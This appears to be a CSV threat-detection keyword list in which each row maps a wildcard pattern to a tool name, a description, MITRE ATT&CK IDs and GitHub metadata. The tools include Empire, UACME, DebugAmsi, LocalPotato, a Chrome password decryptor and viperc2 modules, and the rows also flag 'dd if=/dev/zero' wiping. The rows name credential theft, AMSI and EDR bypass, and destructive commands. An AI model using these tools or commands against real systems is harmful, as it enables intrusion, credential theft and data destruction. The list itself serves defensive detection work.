T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dd if=/dev/nul*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*dd if=/dev/zero*","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*deb.torproject.org/torproject.org/*.asc*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*DebugAmsi.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsi.sln*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsi.vcxproj*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsi-main*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsix64.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsix86.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*debugfs /dev/*","greyware_tool_keyword","debugdfs","Linux SIEM Bypass with debugdfs shell","T1059 - T1053 - T1037","TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*decoder-it/LocalPotato*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*Decode-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*decoy_document.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*decrypt.py .\*.txt utf-16-le*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*decrypt_chrome_password.py*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" +"*Decrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*decrypt-chrome-passwords-main*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" +"*Decrypt-CipherText*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*DecryptNextCharacterWinSCP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*decryptteamviewer*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DecryptWinSCPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*DeEpinGh0st/Erebus*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*deepinstinct/ContainYourself*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*deepinstinct/LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*deepinstinct/NoFilter*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*deepsound2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*deepzec*","offensive_tool_keyword","Github Username","Github Author of malicious scripts and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/deepzec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*defanger exclusion*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*defanger realtime*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*defanger signature*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*default_userpass_for_services_unhash*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*default_users_for_services_unhash.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DefaultBeaconApi*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*DefaultCreds-cheat-sheet*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*--defaults-torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*DefenderCheck*","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","1919","340","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z" +"*DefenderCheck.exe*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_ExampleModule.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_PeLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DefenseEvasion_ProcessInjection_ProcessHandle.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - 